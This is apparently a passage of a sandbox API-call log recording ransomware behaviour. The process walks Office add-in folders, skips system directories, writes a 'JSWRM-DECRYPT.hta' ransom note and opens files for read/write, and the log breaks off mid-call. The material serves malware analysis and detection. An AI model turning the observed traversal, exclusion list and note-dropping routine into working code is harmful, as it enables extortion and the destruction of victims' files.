ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaad0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.497] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.498] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.498] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.498] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.498] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.498] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.498] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.498] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0126.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0126.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0126.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0126.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0126.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0126.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.498] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffddb96c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffddb96c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffddb96c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3e78, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.498] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.506] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.506] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.506] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.506] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.506] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.506] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.506] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.506] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.506] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dcb0 [0126.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0126.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.507] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x637c06e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x637c06e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x637c06e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa060, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.507] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0126.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0126.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0126.508] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6866e01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x688d06d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.508] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0126.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.508] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6866e01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x688d06d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.508] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0126.508] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0126.508] lstrcmpiW (lpString1="eu", lpString2=".") returned 1 [0126.508] lstrcmpiW (lpString1="eu", lpString2="..") returned 1 [0126.508] lstrcmpiW (lpString1="eu", lpString2="...") returned 1 [0126.508] lstrcmpiW (lpString1="eu", lpString2="windows") returned -1 [0126.508] lstrcmpiW (lpString1="eu", lpString2="recovery") returned -1 [0126.508] lstrcmpiW (lpString1="eu", lpString2="perflogs") returned -1 [0126.508] lstrcmpiW (lpString1="eu", lpString2="documents and settings") returned 1 [0126.509] lstrcmpiW (lpString1="eu", lpString2="$RECYCLE.BIN") returned 1 [0126.509] lstrcmpiW (lpString1="eu", lpString2="system volume information") returned -1 [0126.509] lstrcmpiW (lpString1="eu", lpString2="msocache") returned -1 [0126.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\eu\\jswrm-decrypt.hta")) returned 0xffffffff [0126.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\eu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.511] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.511] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.512] CloseHandle (hObject=0x314) returned 1 [0126.512] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\eu\\jswrm-decrypt.hta")) returned 0x20 [0126.512] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42108df9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0126.512] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.512] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42108df9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.512] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.512] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.512] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42108df9, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x42108df9, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x42108df9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.512] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.512] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.513] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16783027, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1135, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.513] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x240f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\eu\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.514] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4405) returned 1 [0126.514] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.514] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1130, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: 